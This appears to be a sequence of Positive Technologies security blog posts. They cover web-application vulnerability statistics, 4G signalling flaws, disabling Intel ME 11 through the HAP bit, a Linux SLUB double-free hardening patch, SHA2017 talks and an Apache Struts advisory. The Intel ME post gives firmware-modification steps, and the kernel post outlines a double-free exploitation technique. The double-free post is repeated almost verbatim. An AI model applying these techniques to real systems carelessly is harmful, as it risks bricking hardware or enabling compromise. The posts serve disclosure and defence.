Moreover, the number of high- and medium-severity vulnerabilities per application on production systems was twice as high compared to test systems. One explanation is that security-conscious companies (which test applications at the development stage, among other things) are better at avoiding vulnerabilities. Another reason is that deployment and implementation are complicated processes that add complexity, and therefore can cause new flaws. Some vulnerabilities can be detected only on a fully configured and ready-to-use system.
Figure 31. Web applications with various vulnerability severity levels
Figure 32. Average number of vulnerabilities per system
These results demonstrate the need to implement application security processes throughout the entire software lifecycle—from design and development to deployment and operation.
5.6. Comparison of test techniques: black box, gray box, and white box
Manual analysis of security enabled our experts to apply black-, gray-, and white-box testing methods. Head-to-head comparison of these methods is impossible, since different methods were applied to different web applications, but we can look at the results to make a general assessment of test technique effectiveness. Most web applications (81%) were analyzed using black- and gray-box testing, without any access to the source code.Figure 33. Applications by test technique used
White-box testing, with analysis of source code, enabled our experts to detect high-severity vulnerabilities in 75 percent of applications. Black-box testing, meaning that our testers did not receive source code or other key information, revealed such vulnerabilities on only 49 percent of web applications. Medium-severity vulnerabilities were found practically in all applications: 98 percent by black-box testing, and 92 percent by analyzing source code. Thus, white-box analysis proved to be more effective in most cases. However, even an attacker who does not have prior information about a web application still has a good chance of finding a high-severity vulnerability.
In addition, attackers can obtain source code by exploiting various vulnerabilities, as already demonstrated above.
Also note that in black- and gray-box testing, the testers were careful to avoid impacting application performance or causing denial of service. But real attackers are unlikely to be so considerate.
Figure 34. Percentage of web applications with vulnerabilities of a given category (by testing technique)
On average, Positive Technologies detected 2.8 high-severity vulnerabilities per application when analyzing source code (white box), and 1.9 vulnerabilities per application without source code (black box). The difference between these two figures is not so dramatic compared to the previous period, because many of the same companies had learned valuable lessons from the prior year's testing. White-box testing is highly effective, as can be confirmed by the automated testing results provided in the following section.
Moreover, white-box testing detected three times more low-severity vulnerabilities than black-box testing. There was a minimal difference in the number of medium-severity vulnerabilities detected using the various techniques.
Figure 35. Average number of vulnerabilities per application (by testing technique)
As in previous years, white-box testing detected more high-severity vulnerabilities. For example, analysis of source code revealed XML External Entity issues four times more often than black-box testing did. Insufficient Session Security, Cross-Site Request Forgery, and Open Redirect were detected primarily with the help of white-box testing.
Figure 36. Average number of certain vulnerabilities per application by testing technique
6. Automated security assessment
This section considers web applications that were subjected to analysis using an automated source code analyzer. Since manual and automated techniques were used on different web applications, same-application comparison of the results is not possible. Instead, we can consider the averages of the results obtained by these two different methods.All applications analyzed here were pre-production, and some of them were at an early development stage. The vulnerabilities detected by automated scanning and represented in the statistics were confirmed manually using testbeds.
The vulnerability classification given here is the same used in the automated security scanner. This classification is different from the WASC classification thanks to its more detailed breakdown of weaknesses, which in the WASC classification are combined into general categories, such as Application Misconfiguration and Improper Filesystem Permissions.
We observe some improvements compared to the 2015 results. A quarter of vulnerabilities were of high severity (28.5%), compared to 40.4 percent in the previous year. Similar to the situation with manual checks in the previous section, part of this change may be due to the fact that the prior year's testing inspired companies to be more careful with security during development.
Figure 37. Severity of vulnerabilities found (automated testing)
All examined applications had at least medium-severity vulnerabilities. As in 2015, high-severity vulnerabilities were found in the vast majority of applications (89%).
Figure 38. Web application distribution by maximum severity level (automated testing)
Medium-severity vulnerabilities were discovered in all examined web applications.
Figure 39. Web applications with vulnerabilities of various severity levels (automated testing)
Automated analysis of source code found an average of 4.6 high-severity, 66.9 medium-severity, and 45.9 low-severity vulnerabilities per application. Moreover, two of the examined applications had hundreds of high-severity vulnerabilities and around 2,000 medium-severity vulnerabilities, but these applications have been omitted here to prevent distortion of the results. At the same time, these values give an idea of the usability and effectiveness of automated analysis tools for improving the security of web applications. Source-code analysis, unlike black-box testing, can identify all exit points—in other words, all possible exploits for each vulnerability. This information is needed to ensure total elimination of vulnerabilities.
Figure 40. Average number of vulnerabilities found per application, by severity (results of automated analysis)
Figure 41. Example of Cross-Site Scripting detection
The code analyzer we used for testing can verify the vulnerabilities it finds by automatically generating exploits. In this example, the exploit was designed to send a request using the GET method.
The most common high-severity vulnerabilities were related to improper restrictions on file access. Almost half of the web applications allow creating and modifying arbitrary files, which enables execution of OS commands, such as if an attacker creates a PHP file. In almost all of these applications, such flaws exist together with Arbitrary File Reading/Removal vulnerabilities. An example of one such vulnerability in source code is shown in the following screenshot. The vulnerability allows an attacker to perform Path Traversal attacks and read arbitrary files on the server.
Figure 42. Example of Arbitrary File Reading detection
The source code of a number of web applications had a high-severity SQL Injection vulnerability related to insufficient input filtering. This vulnerability allows attackers to retrieve information from the database. In some cases, an attacker could read arbitrary files, create new ones, and conduct DoS attacks. The following screenshot provides an example of a vulnerability detected by the analyzer and a test exploit that proves the vulnerability's exploitability.
Figure 43. Example of SQL Injection detection
High-severity XML External Entity vulnerabilities were less common this year but not unheard of. They allow attackers to read arbitrary files or target corporate LAN resources. An example of this vulnerability is shown in the following screenshot.
Figure 44. Example of XXE detection
Automated analysis revealed many other flaws in the source code of the examined applications: a hard-coded password, one-way unsalted hash function, and static random number generator were among the findings.
Overall, the results confirm that web application security assessment must be implemented throughout the entire software lifecycle. Automated source code testing allows identifying the maximum number of coding errors in the shortest possible time, including critical mistakes causing high-severity threats, which if left unfixed can provide a tempting target for attackers.
Conclusions
Although the percentage of web applications with high-severity vulnerabilities improved year-over-year, overall security remains weak. More than 50 percent of web applications have high-severity vulnerabilities, and this value rises sharply if an attacker has access to source code. By exploiting the vulnerabilities we detected, attackers could obtain large amounts of sensitive information including application source code and users' personal data, even from the websites of banks and government institutions. Users cannot rest safe: almost all applications can be exploited by attackers to target users.We also found that web application vulnerabilities are the easiest way to penetrate the corporate LAN. About a quarter of the tested websites could be used by attackers to attack internal company systems.
Source-code analysis is much more effective than methods without access to the application code. Moreover, performing such code analysis during development significantly improves the security of the final application. Automated tools for source-code analysis should be used at multiple stages of development, because analyzers are much quicker than manual analysis.
We found that production web applications were more vulnerable than test applications. This underscores the need to perform security analysis not only during development, but when an application is already in production. Preventive protection measures, in the form of a web application firewall (WAF), are essential for keeping production systems safe.
Despite the modest improvements seen in 2016, web application security clearly still requires more attention. The results demonstrate the need to implement application security processes throughout the entire software lifecycle, both on the part of developers and system administrators responsible for secure operation. Only comprehensive security measures—including secure development procedures, preventive protection, and regular web application security testing—can minimize risks and provide a strong level of security.
↧
4G Networks Infrastructure Still Vulnerable Despite Upgrade
Billions has been invested, super speed reached, yet none of the security holes have been fixed. Positive Technologies has warned that its research confirms vulnerabilities in the world’s mobile infrastructure still exist, despite billions being invested to upgrade mobile networks to Diameter to carry 4G and 5G traffic. The unaddressed flaws leave mobile communications, and the security practices founded on them, vulnerable allowing hackers to intercept and divert SMS messages – including passcodes meant to validate identity and authorise transactions; eavesdrop on phone conversations; locate users; instigate denial of service attacks against the whole network; plus other illegitimate actions. Earlier this year attackers stole funds from bank accounts having redirected one time passcodes (OTPs) sent by banks in Germany, via text message (SMS), confirming that real world attacks have been devised and can be successfully executed.
“The mobile network infrastructure is based on a set of telephony signalling protocols, developed in 1975, when security wasn’t a consideration but was less of a risk as only a few people had access. Today that’s no longer true. Access has spiralled yet security is still non-existent,” explains Michael Downs, Director of Telecoms Security (EMEA) of Positive Technologies. “With Diameter [the new protocol for 4G and 5G networks] used to support thousands of emerging IoT applications – from cars to connected cities, these lax security practices leave us all vulnerable as hackers can easily exploit these flaws.”
Earlier this year it was confirmed that attackers in Germany had accessed the global mobile infrastructure and diverted one time passcodes sent from banks, via SMS message, to authorise transactions and steal money out of compromised accounts. Speaking about this development Michel adds, “This incident shows that these vulnerabilities in the mobile infrastructure open mobile users to the same kind of mass cybercrime threats that Internet users have suffered for years. There’s zero security, with zero control, which equals zero trust. Networks must accept the threat, educate themselves about the attack vectors being used and move to monitor and neutralise the problem. In the meantime, given it’s been proven fallible, using mobile channels as an additional layer of security has to be paused.”
In August 2016 NIST stopped recommending two-factor authentication systems that use SMS due to, what it described as, out of band verification using SMS being deprecated. US Senator Ron Wyden (D-OR) and Representative Ted Lieu (D-CA) have both written to America's communications watchdog, the FCC, asking why reported flaws in global SS7 cell networks have not been addressed.
Positive Technologies has published a whitepaper detailing its findings: https://www.ptsecurity.com/ww-en/premium/diameter-research/
↧
Disabling Intel ME 11 via undocumented mode
Our team of Positive Technologies researchers has delved deep into the internal architecture of Intel Management Engine (ME) 11, revealing a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. In this article, we describe how we discovered this undocumented mode and how it is connected with the U.S. government's High Assurance Platform (HAP) program.
Disclaimer: The methods described here are risky and may damage or destroy your computer. We take no responsibility for any attempts inspired by our work and do not guarantee the operability of anything. For those who are aware of the risks and decide to experiment anyway, we recommend using an SPI programmer.
Introduction
Intel Management Engine is a proprietary technology that consists of a microcontroller integrated into the Platform Controller Hub (PCH) chip and a set of built-in peripherals. The PCH carries almost all communication between the processor and external devices; therefore Intel ME has access to almost all data on the computer. The ability to execute third-party code on Intel ME would allow for a complete compromise of the platform. We see increasing interest in Intel ME internals from researchers all over the world. One of the reasons is the transition of this subsystem to new hardware (x86) and software (modified MINIX as an operating system). The x86 platform allows researchers to make use of the full power of binary code analysis tools. Previously, firmware analysis was difficult because earlier versions of ME were based on an ARCompact microcontroller with an unfamiliar set of instructions.Unfortunately, analysis of Intel ME 11 was previously impossible because the executable modules are compressed by Huffman codes with unknown tables. Nonetheless, our research team (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) managed to recover these tables and created a utility for unpacking images. The utility is available on our GitHub page.
After unpacking the executable modules, we proceeded to examine the software and hardware internals of Intel ME. Our team has been working on this for quite some time, and we have accumulated a large amount of material that we plan to publish. This is the first in a series of articles on the internals of Intel ME and how to disable its core functionality. Experts have long wondered about such an ability in order to reduce the risk of data leaks associated with any potential zero-day vulnerabilities in Intel ME.
How to disable ME
Some users of x86 computers have asked the question: how can one disable Intel ME? The issue has been raised by many, including Positive Technologies experts. [, ]. And with the recently discovered critical (9.8/10) vulnerability in Intel Active Management Technology (AMT), which is based on Intel ME, the question has taken on new urgency.The disappointing fact is that on modern computers, it is impossible to completely disable ME. This is primarily due to the fact that this technology is responsible for initialization, power management, and launch of the main processor. Another complication lies in the fact that some data is hard-coded inside the PCH chip functioning as the southbridge on modern motherboards. The main method used by enthusiasts trying to disable ME is to remove everything "redundant" from the image while maintaining the computer's operability. But this is not so easy, because if built-in PCH code does not find ME modules in the flash memory or detects that they are damaged, the system will not start.
The me_cleaner project, in development for several years, has created a special utility for deleting most of the image and leaving only the components vital for the main system. But even if the system starts, the joy is short-lived—after about 30 minutes, the system may shut down automatically. The reason is that, after some failures, ME enters Recovery Mode, in which it can operate only for a certain period of time. As a result, the cleaning process becomes more complicated. For example, with earlier versions of Intel ME, it was possible to reduce the image size to 90 KB but the Intel ME 11 image can only be reduced to 650 KB.
Figure 1. Support for Skylake and later architectures in me_cleaner
Secrets in QResource
Intel allows motherboard manufacturers to set a small number of ME parameters. For this, the company provides hardware manufacturers with special software, including utilities such as Flash Image Tool (FIT) for configuring ME parameters and Flash Programming Tool (FPT) for programming flash memory directly via the built-in SPI controller. These programs are not provided to end users, but they can be easily found on the Internet.Figure 2. Compressed XML files
From these utilities, you can extract a large number of XML files (detailed description of the process). These files contain a lot of interesting information: the structure of ME firmware and description of the PCH strap, as well as special configuration bits for various subsystems integrated into the PCH chip. One of the fields, called "reserve_hap", drew our attention because there was a comment next to it: "High Assurance Platform (HAP) enable".
Figure 3. PCH strap for High Assurance Platform
Googling did not take long. The second search result said that the name belongs to a trusted platform program linked to the U.S. National Security Agency (NSA). A graphics-rich presentation describing the program can be found here. Our first impulse was to set this bit and see what happens. Anyone with an SPI programmer or access to the Flash Descriptor can do this (on many motherboards, access rights to flash memory regions are set incorrectly).
Figure 4. Status of ME after activating the HAP bit
After the platform is loaded, the MEInfo utility reports a strange status: "Alt Disable Mode." Quick checks showed that ME did not respond to commands or react to requests from the operating system. We decided to figure out how the system goes into this mode and what it means. By that time, we had already analyzed the main part of the BUP module, which is responsible for initialization of the platform and sets the status displayed by MEInfo. In order to understand how BUP works, a more detailed description of the Intel ME software environment is necessary.
Intel ME 11 architecture overview
Starting with the PCH 100 Series, Intel has completely redesigned the PCH chip. The architecture of embedded microcontrollers was switched from ARCompact by ARC to x86. The Minute IA (MIA) 32-bit microcontroller was chosen as the basis; it is used in Intel Edison microcomputers and SoCs Quark and based on a rather old scalar Intel 486 microprocessor with the addition of a set of instructions (ISA) from the Pentium processor. However, for the PCH, Intel manufactures this core with 22-nm semiconductor technology, making the microcontroller highly energy-efficient. There are three such cores in the new PCH: Management Engine (ME), Integrated Sensors Hub (ISH), and Innovation Engine (IE). The latter two can be enabled or disabled depending on the PCH model and the target platform; the ME core is always enabled.Figure 5. Three x86 processors in the PCH
Such an overhaul required changing ME software as well. In particular, MINIX was chosen as the basis for the operating system (previously, ThreadX RTOS had been used). Now ME firmware includes a full-fledged operating system with processes, threads, memory manager, hardware bus driver, file system, and many other components. A hardware cryptoprocessor supporting SHA256, AES, RSA, and HMAC is now integrated into ME. User processes access hardware via a local descriptor table (LDT). The address space of a process is also organized through an LDT—it is just part of the global address space of the kernel space whose boundaries are specified in a local descriptor. Therefore, the kernel does not need to switch between the memory of different processes (changing page directories), as compared to Microsoft Windows or Linux, for instance.
Keeping in mind this overview of Intel ME software, now we can examine how the operating system and modules are loaded.
Intel ME loading stages
Loading starts with the ROM program, which is contained in the built-in PCH read-only memory. Unfortunately, no way to read or rewrite this memory is known to the general public. However, one can find pre-release versions of ME firmware on the Internet containing the ROMB (ROM BYPASS) section which, as we can assume, duplicates the functionality of ROM. So by examining such firmware, it is possible to reproduce the basic functionality of the initialization program.Examining ROMB allows determining the purpose of ROM that is performing hardware initialization (for example, initialization of the SPI controller), verifying the digital signature of the FTPR header, and loading the RBE module located in the flash memory. RBE, in turn, verifies the checksums of the KERNEL, SYSLIB, and BUP modules and hands over control to the kernel entry point.
It should be noted that ROM, RBE, and KERNEL are executed at the zero privilege level (in ring-0) of the MIA kernel.
Figure 6. Verifying integrity of SYSLIB, KERNEL, and BUP in RBE
The first process that the kernel creates is BUP, which runs in its own address space in ring-3. The kernel does not launch any other processes itself; this is done by BUP itself, as well as a separate LOADMGR module, which we will discuss later. The purpose of BUP (BringUP platform) is to initialize the entire hardware environment of the platform (including the processor), perform primary power management functions (for example, starting the platform when the power button is pressed), and start all other ME processes. Therefore, it is certain that the PCH 100 Series or later is physically unable to start without valid ME firmware. Firstly, BUP initializes the power management controller (PMC) and the ICC controller. Secondly, it starts a whole string of processes; some of them are hard-coded (SYNCMAN, PM, VFS), and the others are contained in InitScript (similar to autorun), which is stored in the FTPR volume header and digitally signed.
Figure 7. Starting SYNCMAN and PM
Thus, BUP reads InitScript and starts all processes that conform to the ME startup type and are IBL processes.
Figure 8. Processing InitScript
Figure 9. List of modules with the IBL flag
If a process fails to start, BUP will not start the system. As shown in Figure 9, LOADMGR is the last IBL process on the list. It starts the remaining processes, but unlike BUP, if an error occurs during module startup, LOADMGR will just proceed to the next one.
This means that the first way to "slim down" Intel ME is to remove all modules that do not have the IBL flag in InitScript, which will significantly reduce the firmware size. But our initial task was to find out what happens to ME in HAP mode. For this, let us examine the BUP software model.
Figure 10. Startup of modules in ME
BringUP
If you look closely at how the BUP module works, you can say that a classic finite state machine is implemented inside it. Execution is functionally divided into two components: initialization stages (finite state machine) and execution of service requests of other processes after the system is initialized. The number of initialization stages may vary depending on the platform and SKU (TXE, CSME, SPS, consumer, corporate) but the main stages are common to all versions.Stage 1
During the initial stage, the sfs internal diagnostic file system (SUSRAM FS, a file system located in non-volatile memory) is created, the configuration is read, and, most importantly, the PMC is queried about what caused the startup: power-on of the platform, restart of the entire platform, ME restart, or waking up from sleep. This stage is called boot flow determination. Subsequent stages in the work of the initialization finite automaton depend on it. In addition, several modes are supported: normal and a set of service modes in which the main ME functionality is disabled (HAP, HMRFPO, TEMP_DISABLE, RECOVERY, SAFE_MODE, FW_UPDATE, and FD_OVERRIDE).Stage 2
At the next stage, the ICC controller is initialized and the ICC profile (responsible for clock frequencies of the main consumers) is loaded. Boot Guard is initialized and cyclic polling for processor startup confirmation is started.Stage 3
BUP awaits a message from the PMC confirming that the main processor has started. After that, BUP starts the PMC asynchronous polling cycle for power events (restart or shutdown of the platform) and proceeds to the next stage. If such an event occurs, BUP will perform the requested action between the initialization stages.Stage 4
At this stage, internal hardware is initialized. Also, BUP starts the heci (a special device designed to receive commands from the BIOS or the operating system) polling cycle for the DID (DRAM Init Done message) from the BIOS. It is this message that allows ME to determine that the main BIOS has initialized RAM and reserved a special region, UMA, for ME, and then proceed to the next stage.Stage 5
Once the DID is received, BUP—depending on the mode, which is determined by various factors—either starts IBL processes from InitScript (in normal mode) or hangs in a loop, which it can exit only when it receives a message from the PMC, for example as a result of a request to restart or shut down the system.It is at this stage that we find HAP processing; in this mode, BUP hangs instead of executing InitScript. This means that the remaining sequence of actions in normal mode has nothing to do with HAP and will not be considered. The main thing we would like to note is that in HAP mode, BUP initializes the entire platform (ICC, Boot Guard) but does not start the main ME processes.
Figure 11. Determining HAP mode
Figure 12. Switching ME to Stage 5 causing it to hang
Figure 13. Stage 5
Setting the HAP bit
The aforementioned facts help to reveal the second method of disabling Intel ME:1. Set the HAP bit.So how can we set the HAP bit? We can use the FIT configuration files and determine the location of the bit in the image, but there is a simpler way. In the ME Kernel section of FIT, you can find a Reserved parameter. This is the particular bit that enables HAP mode.
2. In the CPD section of the FTPR, remove or damage all modules except those required by BUP for startup:
- RBE
- KERNEL
- SYSLIB
3. Fix the checksum of the CPD header (for more details on the structure of ME firmware, see this paper).
- dBUP
Figure 14. HAP mode activation bit
HAP and Boot Guard
We also found some code in BUP that, when HAP mode is enabled, sets an additional bit in Boot Guard policies. Unfortunately, we have not succeeded in finding out what this bit controls.Figure 15. Setting an additional bit for Boot Guard
Support for ME 11 in me_cleaner
While this article was being prepared, the me_cleaner developers updated their utility. Now it also removes all the modules from the images except RBE, KERNEL, SYSLIB, and BUP, but it does not set the HAP bit, which forces ME into TemporaryDisable mode. We were curious to find out what happens with this approach.We found that deleting partitions with the ME file system results in an error during reading of the cfg_rules file. This file contains a number of different system settings. Among them, as we believe, is the flag that we called "bup_not_temporary_disable". If this flag is not set, the entire subsystem is switched to TemporaryDisable mode, and since the flag is a global variable initialized by zero, the read error is regarded as a configuration requiring disconnection.
We also checked the firmware of server and mobile versions of ME (SPS 4.x and TXE 3.x). In the server version, this flag is always set to 1; in the mobile version, it is ignored. This means that this method will not work in server and mobile versions (Apollo Lake) of ME.
Figure 16. Reading the cfg_rules file
Closing thoughts
So we have found an undocumented PCH strap that can be used to switch on a special mode disabling the main Intel ME functionality at an early stage. We can prove this by the following facts:- Binary analysis of Intel ME firmware, as described in this paper.
- If we remove some critical ME modules and enable HAP mode, Intel ME does not crash. This proves that HAP disables ME at an early stage.
- We are quite sure that Intel ME is unable to exit this mode because we have not found code capable of doing so in the RBE, KERNEL, and SYSLIB modules.
Similarly, we are sure that the ROM integrated into the PCH is practically the same as ROMB, which also does not contain any code allowing an exit from HAP mode.
Hence HAP protects against vulnerabilities present in all modules except RBE, KERNEL, SYSLIB, ROM, and BUP. However, unfortunately this mode does not protect against exploitation of errors at earlier stages.
Intel representatives have been informed about the details of our research. Their response has confirmed our hypothesis about the connection of the undocumented mode with the High Assurance Platform program. With their permission, we quote Intel's answer below:
Mark/Maxim,
In response to requests from customers with specialized requirements we sometimes explore the modification or disabling of certain features. In this case, the modifications were made at the request of equipment manufacturers in support of their customer’s evaluation of the US government’s “High Assurance Platform” program. These modifications underwent a limited validation cycle and are not an officially supported configuration.
We believe that this mechanism is designed to meet a typical requirement of government agencies, which want to reduce the possibility of side-channel leaks. But the main question remains: how does HAP affect Boot Guard? Due to the closed nature of this technology, it is not possible to answer this question yet, but we hope to do so soon.
Mark Ermolov, Maxim Goryachy
↧
↧
Blocking double-free in Linux kernel
On the 7-th of August the Positive Technologies expert Alexander Popov gave a talk at SHA2017. SHA stands for Still Hacking Anyway, it is a big outdoor hacker camp in Netherlands.
The slides and recording of Alexander's talk are available.
This short article describes some new aspects of Alexander's talk, which haven't been covered in our blog.
The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between double free() calls (see the diagram below). That technique is called heap spraying.
However, in case of CVE-2017-2636, which Alexander exploited, there are 13 buffers freed straightaway. Moreover, the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for that vulnerability. Nevertheless, Alexander has managed to turn that state of the system into a use-after-free error. He abused the naive behaviour of SLUB, which is currently the main Linux kernel allocator.
It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, GNU C library allocator has a "fasttop" check against it, which introduces a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is similar to the last one on the allocator's "freelist".
A similar check in SLUB would block some double-free exploits in Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified set_freepointer() function in mm/slub.c and sent the patch to the Linux Kernel Mailing List (LKML). It provoked a lively discussion.
The SLUB maintainers didn't like that this check:
Alexander replied with his arguments:
Finally Kees Cook helped to negotiate adding Alexander's check behind CONFIG_SLAB_FREELIST_HARDENED kernel option. So currently the second version of
Alexander's patch is accepted and applied to the linux-next branch. It should get to the Linux kernel mainline in the nearest future.
We hope that in future some popular Linux distribution will provide the kernel
with the security hardening options (including CONFIG_SLAB_FREELIST_HARDENED)
enabled by default.
The slides and recording of Alexander's talk are available.
This short article describes some new aspects of Alexander's talk, which haven't been covered in our blog.
The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between double free() calls (see the diagram below). That technique is called heap spraying.
However, in case of CVE-2017-2636, which Alexander exploited, there are 13 buffers freed straightaway. Moreover, the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for that vulnerability. Nevertheless, Alexander has managed to turn that state of the system into a use-after-free error. He abused the naive behaviour of SLUB, which is currently the main Linux kernel allocator.
It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, GNU C library allocator has a "fasttop" check against it, which introduces a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is similar to the last one on the allocator's "freelist".
A similar check in SLUB would block some double-free exploits in Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified set_freepointer() function in mm/slub.c and sent the patch to the Linux Kernel Mailing List (LKML). It provoked a lively discussion.
The SLUB maintainers didn't like that this check:
- introduces some performance penalty for the default SLUB functionality;
- duplicates some part of already existing slub_debug feature;
- causes a kernel oops in case of a double-free error.
Alexander replied with his arguments:
- slub_debug is not enabled in Linux distributions by default (due to the noticeable performance impact);
- when the allocator detects a double-free, some severe kernel error has already occurred on behalf of some process. So it might not be worth trusting that process (which might be an exploit).
Finally Kees Cook helped to negotiate adding Alexander's check behind CONFIG_SLAB_FREELIST_HARDENED kernel option. So currently the second version of
Alexander's patch is accepted and applied to the linux-next branch. It should get to the Linux kernel mainline in the nearest future.
We hope that in future some popular Linux distribution will provide the kernel
with the security hardening options (including CONFIG_SLAB_FREELIST_HARDENED)
enabled by default.
↧
12 Great Technical Talks at SHA2017
image credit Arron Dowdeswell @Arronandir
SHA2017 is a large outdoor hacker camp, which took place in the Netherlands on August 4th to 8th. Despite the intensive preparation of his own talk at this event, a Positive Technologies expert Alexander Popov attended a lot of interesting lectures. In this article Alexander shares his impressions and lists 12 great technical talks at SHA2017, which he liked the most.
1. How the NSA tracks you
Bill Binney gave the keynote and described how NSA tracks us. On the one hand, the topic is no longer a sensation today. On the other hand, I would note that this man had a 34-year long career at NSA finally becoming the Technical Director of the organization. During his talk I was sitting in the front row and I was really impressed by the piercing gaze of the speaker.The recording:
2. Mathematics and Video Games
An entertaining and funny talk about the applications of graph theory and topology in the nice old games like Pacman and Space Invaders.
The recording:
3. Automotive Microcontrollers. Safety != Security
A very interesting lecture about hacking automotive systems using fault injection: voltage or electromagnetic glitches, laser shooting and other cool hacks. The researchers described why meeting the ISO 26262 standard requirements of functional safety does not help against low-level attacks.
The recording:
4. DNA: The Code of Live
An excellent lecture by Bert Hubert about DNA from the information technologies perspective. Not only is he a charismatic speaker, but also his talk was well prepared for the hacker conference. So the hour flew by and I found myself fascinated by the way God encoded life with DNA.
The recording:
5. Improving Security with Fuzzing and Sanitizers
A cool talk on a highly relevant topic from a very famous German security researcher - Hanno Böck. I gained some new ideas about fuzzing methods and used the opportunity to ask Hanno some questions about Sanitizers.
The recording:
6. Race for Root: Analysis of the Linux Kernel Race Condition Exploit
A very good technical talk, let me recommend it ;) I described the CVE-2017-2636 vulnerability, which I found in the Linux kernel, explained my PoC exploit for it and showed the local privilege escalation demo.
The recording:
The slides.
I would like to note that the Linux kernel maintainers have accepted my patch which blocks similar exploits. More technical details are available at the Positive Technologies blog.
7. Flip Feng Shui
One of the most notable talks of SHA2017. Victor van der Veen and Kaveh Razavi are renowned information security researchers. They have just won the prestigious PWNIE award for exploiting the Rowhammer hardware bug to attack cloud and mobile platforms. The speakers effectively explained their exploits and showed nice demos.
The recording:
8. Computational Thinking
An interesting and entertaining lecture by Pauline Maas, who shared her successful experience of involving little children and teenagers into programming, DIY and computational thinking in general. Yes, it is fun!
The recording:
9. Bypassing Secure Boot using Fault Injection
An impressive technical talk about fault injection attacks. The audience, myself included, was impressed by the live demo of bypassing Secure Boot checks on ARM using voltage glitches.
The recording:
10. Rooting the MikroTik Routers
A high quality technical talk with live demos of hacking the MikroTik industrial routers. At the end Kirils Solovjovs made his router beep a nice tune. The audience liked it.
The recording:
11. Off Grid: Disclosing Your 0days in a Videogame Mod
A really cool talk about a really cool hacking videogame called Off Grid. You play for a hacker breaking systems in a huge building of some corporation. The software on desktops, smartphones, IoT devices, which you hack, actually runs on virtual machines. So it's real fun :) Moreover, the game allows you to practice social engineering and other tricks. Off Grid developers showed some live demos of the gameplay, and the audience appreciated that a lot.
The recording:
12. FaceDancer 2.0
A very interesting lecture by the developers of FaceDancer 2.0. It is an improved technology for fuzzing various USB software stacks. In fact, the Linux kernel and other OS have the wrong security policy regarding trust to the hardware. In particular, USB software stacks usually imply the accurate
behaviour of everything attached via USB. That wrong assumption makes "Bad USB" attacks so effective. FaceDancer 2.0 provides the reach capabilities of fuzzing USB hosts and making them more robust.
The recording:
Eh, SHA2017 is over... But Still Hacking Anyway!
↧
New Apache Struts vulnerability allows remote code execution
A new security flaw detected in Apache Struts allows an unauthenticated attacker to execute arbitrary code on a vulnerable system.
Although the Apache Software Foundation classified it as a medium severity vulnerability, Cisco has outlined a long list of its products in the Security Advisory that are affected by this flaw.
Extent of the problem
The vulnerability is contained in the FreeMarker functionality of the Apache Struts 2 package. FreeMarker Template Language is widely used in Apache Struts and numerous Java-based projects. Developers can use it to bind parameter values sent from a user application to a server with internal declared variables of the application.
Incorrect performance makes it possible for attackers to send Object Graph Navigation Language (OGNL) expressions to the server, the processing of which can cause arbitrary code execution.
Currently, the vulnerability is confirmed in several Cisco products:
- Cisco Digital Media Manager — no patch will be issued as the product support was officially ceased on August 19, 2016
- Cisco Hosted Collaboration Solution for Contact Center
- Cisco Unified Contact Center Enterprise
- Cisco Unified Intelligent Contact Management Enterprise
Over 20 Cisco products are still under investigation to determine whether they have security flaws. Finalized information will be available in Security Advisory update.
Not only Cisco: breaking into Equifax
Apart from CVE-2017-12611 (S2-053), several similar security flaws, including CVE-2017-9805 (S2-052), CVE-2017-9791 (S2-048), and CVE-2017-5638 (S2-045), had already been detected in Apache Struts. The media informed that hackers exploited a vulnerability in Apache Struts to steal client records of credit reporting agency Equifax. Exact details of the attack are still being confirmed.
According to Leigh-Anne Galloway, an expert at Positive Technologies, such attacks can be used to steal credit card data or use information about people having a good credit score to cheat banks and get loans.
Moreover, Equifax's website used to set up credit account monitoring also turned out to have a vulnerability hackers could exploit to steal users' data.
In the aftermath of Equifax's breach, the development team of Apache Struts issued a statement with a recommendation to all users of the framework advising usage of special tools to ensure infrastructure security. One of the tools to prevent attacks exploiting such vulnerabilities is WAF (we develop our own PT Application Firewall).
How to protect yourself
Although a number of Cisco products are vulnerable to CVE-2017-12611, it is likely this will not have large-scale consequences, because an application under attack needs to have a specific configuration for this vulnerability to be exploited successfully. If developers do not use FreeMarker Template Language structures or apply exclusively read-only entities to initialize attributes, it is impossible to exploit the fault.
Moreover, Positive Technologies recommends application developers install Apache Struts version 2.5.12 or 2.3.34, which contain more restricted FreeMarker configuration. This would also reduce the risk of a successful attack.
↧